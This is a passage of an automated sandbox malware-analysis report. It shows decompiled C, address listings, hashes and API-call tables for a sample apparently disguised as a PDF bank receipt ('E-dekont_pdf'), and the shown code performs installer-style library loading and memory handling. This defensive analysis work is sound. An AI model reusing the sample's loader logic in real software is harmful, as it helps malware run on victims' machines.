                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                              • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                              • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                              • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F13167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E6F13167A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x6f135040 =  *((intOrPtr*)(_t87 + 8));
				 *0x6f13503c =  *((intOrPtr*)(_t87 + 0x94));
				 *0x6f135038 =  *((intOrPtr*)(_t87 + 0x90));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x9c)) + 0xc))( *0x6f135014, E6F13132B, _t84);
				_push("true");
				_t37 = E6F132351();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E6F131FCB(_t85);
					}
					E6F132049(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E6F132209(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_t64 = 8;
								_t14 = _t85 + 0x1018; // 0x1018
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E6F131F1E(_t85, _t87 + 0x30);
								 *(_t85 + 0x1034) =  *(_t85 + 0x1034) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x1020)) = _t43;
								 *_t56 = 4;
								E6F132209(_t85);
								_t66 = 8;
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E6F132209(_t85);
							_t37 = GlobalFree(E6F1315EB(E6F131668(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E6F13200D(_t85);
							_t62 =  *(_t85 + 0x1010);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x1008);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x1010);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E6F1315C5( *0x6f13502c);
							}
						}
						if(( *(_t85 + 0x1010) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85); // executed
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E6F132F9F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E6F132D14(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E6F1317F7();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}



















                                                                                              0x6f13167a
                                                                                              0x6f13167a
                                                                                              0x6f13167a
                                                                                              0x6f131684
                                                                                              0x6f131690
                                                                                              0x6f13169d
                                                                                              0x6f1316b4
                                                                                              0x6f1316b7
                                                                                              0x6f1316b9
                                                                                              0x6f1316be
                                                                                              0x6f1316c3
                                                                                              0x6f1317ef
                                                                                              0x6f1317f6
                                                                                              0x6f1316c9
                                                                                              0x6f1316cd
                                                                                              0x6f1316d0
                                                                                              0x6f1316d5
                                                                                              0x6f1316d7
                                                                                              0x6f1316e1
                                                                                              0x6f131719
                                                                                              0x6f131720
                                                                                              0x6f131744
                                                                                              0x6f131792
                                                                                              0x6f131746
                                                                                              0x6f131746
                                                                                              0x6f131747
                                                                                              0x6f131748
                                                                                              0x6f13174b
                                                                                              0x6f131750
                                                                                              0x6f131750
                                                                                              0x6f13175d
                                                                                              0x6f131760
                                                                                              0x6f131765
                                                                                              0x6f13176d
                                                                                              0x6f131773
                                                                                              0x6f131779
                                                                                              0x6f131789
                                                                                              0x6f13178a
                                                                                              0x6f13178e
                                                                                              0x6f131722
                                                                                              0x6f131723
                                                                                              0x6f131738
                                                                                              0x6f131738
                                                                                              0x6f13179c
                                                                                              0x6f13179f
                                                                                              0x6f1317a5
                                                                                              0x6f1317ab
                                                                                              0x6f1317b0
                                                                                              0x6f1317b8
                                                                                              0x6f1317c0
                                                                                              0x6f1317c3
                                                                                              0x6f1317c9
                                                                                              0x6f1317c9
                                                                                              0x6f1317c0
                                                                                              0x6f1317d1
                                                                                              0x6f1317d9
                                                                                              0x6f1317de
                                                                                              0x6f1317d1
                                                                                              0x6f1317e6
                                                                                              0x6f1317e9
                                                                                              0x6f1317e9
                                                                                              0x00000000
                                                                                              0x6f1317e6
                                                                                              0x6f1316e6
                                                                                              0x6f1316e9
                                                                                              0x6f13170e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f131711
                                                                                              0x6f131716
                                                                                              0x6f131716
                                                                                              0x6f131718
                                                                                              0x00000000
                                                                                              0x6f131718
                                                                                              0x6f1316eb
                                                                                              0x6f1316ee
                                                                                              0x6f1316fa
                                                                                              0x6f1316fb
                                                                                              0x00000000
                                                                                              0x6f1316fb
                                                                                              0x6f1316f0
                                                                                              0x6f1316f3
                                                                                              0x6f131702
                                                                                              0x6f131703
                                                                                              0x00000000
                                                                                              0x6f131703
                                                                                              0x6f1316f8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1316f8

                                                                                              APIs
                                                                                                • Part of subcall function 6F132351: GlobalFree.KERNEL32(?), ref: 6F132A44
                                                                                                • Part of subcall function 6F132351: GlobalFree.KERNELBASE(?), ref: 6F132A4A
                                                                                                • Part of subcall function 6F132351: GlobalFree.KERNELBASE(?), ref: 6F132A50
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F131738
                                                                                              • FreeLibrary.KERNEL32(?), ref: 6F1317C3
                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 6F1317E9
                                                                                                • Part of subcall function 6F131FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6F131FFA
                                                                                                • Part of subcall function 6F1317F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6F131708,00000000), ref: 6F13189A
                                                                                                • Part of subcall function 6F131F1E: wsprintfW.USER32 ref: 6F131F51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3962662361-0
                                                                                              • Opcode ID: 65dabee6c7b343fbff960c777980be92155f2ff6b9993521a080e7a15f77d29e
                                                                                              • Instruction ID: 2c82c390cba4b63024be6c58f52ea43c96ffd033ccd7dc20b15002699b306f1c
                                                                                              • Opcode Fuzzy Hash: 65dabee6c7b343fbff960c777980be92155f2ff6b9993521a080e7a15f77d29e
                                                                                              • Instruction Fuzzy Hash: E141E733D043A9AFCB309F68C844BDA37E9BB013E5F04401AF85D6A182DB76B569C690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 60%
                                                                                              			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x470320");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4702e8 =  *0x4702e8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6("true");
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x2000, _t37, 0x41e658, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                              0x004020d8
                                                                                              0x004020d8
                                                                                              0x004020dd
                                                                                              0x004020e4
                                                                                              0x004021a3
                                                                                              0x004022f1
                                                                                              0x004022f1
                                                                                              0x00402c2a
                                                                                              0x00402c2d
                                                                                              0x00402c39
                                                                                              0x00402c39
                                                                                              0x004020f3
                                                                                              0x004020fd
                                                                                              0x00402100
                                                                                              0x00402110
                                                                                              0x00402114
                                                                                              0x0040211a
                                                                                              0x0040211c
                                                                                              0x0040211f
                                                                                              0x0040219c
                                                                                              0x00000000
                                                                                              0x0040219c
                                                                                              0x00402121
                                                                                              0x0040212c
                                                                                              0x00402130
                                                                                              0x00402170
                                                                                              0x00402132
                                                                                              0x00402135
                                                                                              0x00402138
                                                                                              0x00402164
                                                                                              0x0040213a
                                                                                              0x0040213d
                                                                                              0x00402146
                                                                                              0x00402148
                                                                                              0x00402148
                                                                                              0x00402146
                                                                                              0x00402138
                                                                                              0x00402178
                                                                                              0x00402191
                                                                                              0x00402191
                                                                                              0x00000000
                                                                                              0x00402178
                                                                                              0x00402103
                                                                                              0x0040210b
                                                                                              0x0040210e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402103
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402114
                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402191
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 334405425-0
                                                                                              • Opcode ID: 6cb17ac3d970e0bdfaa2c1be5cb1a6e9549cdf613ade09b6f1eae660a02cad5e
                                                                                              • Instruction ID: 47d4d566cceca616c63cef1e7df65318a890c8b7856780658557070bf90f6c25
                                                                                              • Opcode Fuzzy Hash: 6cb17ac3d970e0bdfaa2c1be5cb1a6e9549cdf613ade09b6f1eae660a02cad5e
                                                                                              • Instruction Fuzzy Hash: C921D131904204FADF11AFA5CF4CA9DBA71BF48354F60413BF505B91E1DBBD8A829A1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 59%
                                                                                              			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x41e658; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x4004); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E004066A5(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x41e658; // 0x0
						 *_t34 = _t12;
						 *0x41e658 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x4
							E00406668(_t30, _t3);
							_push(_t33);
							 *0x41e658 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E00406668(_t32, _t33 + 4);
								_t22 =  *0x41e658; // 0x0
								E00406668(_t36, _t22 + 4);
								_t25 =  *0x41e658; // 0x0
								_push(_t32);
								_push(_t25 + 4);
								E00406668();
								L15:
								 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004066A5(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405CC8();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}














                                                                                              0x00401b9b
                                                                                              0x00401b9b
                                                                                              0x00401b9e
                                                                                              0x00401ba6
                                                                                              0x00401bef
                                                                                              0x00401c1d
                                                                                              0x00401c26
                                                                                              0x00401c28
                                                                                              0x00401c2c
                                                                                              0x00401c31
                                                                                              0x00401c36
                                                                                              0x00401c38
                                                                                              0x00401bf1
                                                                                              0x00401bf3
                                                                                              0x0040292e
                                                                                              0x00401bf9
                                                                                              0x00401bf9
                                                                                              0x00401bfe
                                                                                              0x00401c05
                                                                                              0x00401c06
                                                                                              0x00401c0b
                                                                                              0x00401c0b
                                                                                              0x00401bf3
                                                                                              0x00000000
                                                                                              0x00401ba8
                                                                                              0x00401ba8
                                                                                              0x00401ba8
                                                                                              0x00401bab
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401bb1
                                                                                              0x00401bb5
                                                                                              0x00000000
                                                                                              0x00401bb7
                                                                                              0x00401bb9
                                                                                              0x00000000
                                                                                              0x00401bbf
                                                                                              0x00401bbf
                                                                                              0x00401bc2
                                                                                              0x00401bc9
                                                                                              0x00401bce
                                                                                              0x00401bd8
                                                                                              0x00401bdd
                                                                                              0x00401be2
                                                                                              0x00401be6
                                                                                              0x00402a94
                                                                                              0x00402c2a
                                                                                              0x00402c2d
                                                                                              0x00402c33
                                                                                              0x00402c33
                                                                                              0x00401bb9
                                                                                              0x00000000
                                                                                              0x00401bb5
                                                                                              0x0040238a
                                                                                              0x00402397
                                                                                              0x00402398
                                                                                              0x0040239d
                                                                                              0x0040239d
                                                                                              0x00402c35
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                              • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401C1D
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsdECC9.tmp\System.dll,00000000), ref: 004068A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFreelstrcatlstrlen
                                                                                              • String ID: Call
                                                                                              • API String ID: 3292104215-1824292864
                                                                                              • Opcode ID: a9d2187e040ee4697ff3add997d8a8dad27d27370b9dd5eba1639da8b258d051
